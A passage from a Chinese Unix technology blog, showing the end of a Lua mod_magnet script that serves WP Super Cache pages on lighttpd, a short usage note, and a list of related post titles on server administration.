cached_page = string.gsub(cached_page, “index.php/”, “/”)
55.
cached_page = string.gsub(cached_page, “//”, “/”)
56.

57.
–If the client accepts gzipped content, send gzipped content
58.
if (string.find(accept_encoding, “gzip”)) then
59.
–If for some reason the gzipped file does not exist, fallback to the
60.
–uncompressed cached file
61.
if not serve_gzip(cached_page, expiration_time) then
62.
serve_html(cached_page,expiration_time) end
63.
else
64.
serve_html(cached_page,expiration_time)
65.
end
66.
end
67.
end

If you want to use the script in your own server, the only things that you have to change is the hardcoded /opt/apps/wordpress/ path and the expiration_time variable.

Kudos to Giovanni Intini for porting the Apache mod_rewrite’s rules on mod_magnet and the original idea of the script.

温室小花.技术.博客 --纯粹的unix技术博客 » 应用服务

XOOPS安全向導(网上转摘）

rhel5.4中文包的安装以及WebSphere概要文件的创建与删除

用Xmanager远程连接Red hat Enterprise Linux 5

drupal CMS 系统安装ubercart 报内存不足的解决办法

恢复Unix系统被删除的文件

关于 joomla 404 错误解决办法-组件未找到 component not found

linux 中命令yum的用法 (网上找的）

centos4.2 下yum 安装apache2 mysql4 php4 笔记

zabbix 1.6.6 安装配置步骤

zencart 常用操作技巧

给xoops 安装上zencart模块，解决后台login页面错误

终于搞明白ecshop后台的文章编辑功能不能用的原因

Debian 配置 LAMP (debian5.0+apache2.2+mysql5.0+php5.0 )

非常好的lighttpd 安装配置说明文档

linux 下的lighttpd不能加载zend Optimizer的解决方法

有用的常用软件及命令设置参数记录

SSH工具SCP使用示例详细解析

linux 用scp 来迁移数据，另附Linux scp 使用详解

配置Linux+Apache+PHP+Informix

多款国外开源网店系统的功能对比与分析

File/pdc/samba文件打印共享服务器建设方案.

mail 邮件服务器建设方案.

功能强大的CMS–XOOPS简介与评述.

FreeBSD下安装SysCP主机管理系统

今天尝试在ubuntu9.04安装chrome for linux，但不成功

ubuntu 9.04 安装scrot 截图软件

FreeBSD传真服务器(FreeBSD+HylaFax+Apache+php+Mysql+AvantFax)

Apache 重写规则的常见应用 (rewrite)

Apache中设置网站301重定向

linux 加载u盘、光盘、软盘& mount使用指南

Ubuntu空间不够用,为Ubuntu减肥,腾点空间出来

FREEBSD+PF 在6.2上的架设放DDOS 攻击的网站

freebsd 播客安装教程(附带mencoder 转换)

这段时间分析zencart源代码的思想笔记。

dos批处理命令详解

crontab 详解

预定义变量之服务器变量：$_SERVER

解决与明白HP541笔记本电脑不能ghost的问题。

ubuntu9.04下安装IBUS中文输入法

从网上找到的可用的。wordpress api-keys

收集的zencart 相关文档,方便读懂zencart源代码

什么是Zen Cart？

Freebsd 安装带杀毒功能的samba文件服务器

结过昨晚的努力，终于解决博客分类下拉菜单的问题

解决IE8安装ALEXA工具条出现不兼容的问题

centos4.4 升级内核打netfilter补丁

unix常用指令及参数

解决DZ论坛附件无法保存到服务器的部题。

OpenBSD4.4下架设CS1.6服务器

Installing WP Super Cache with lighttpd

freebsd 播客安装教程(附带mencoder　转换)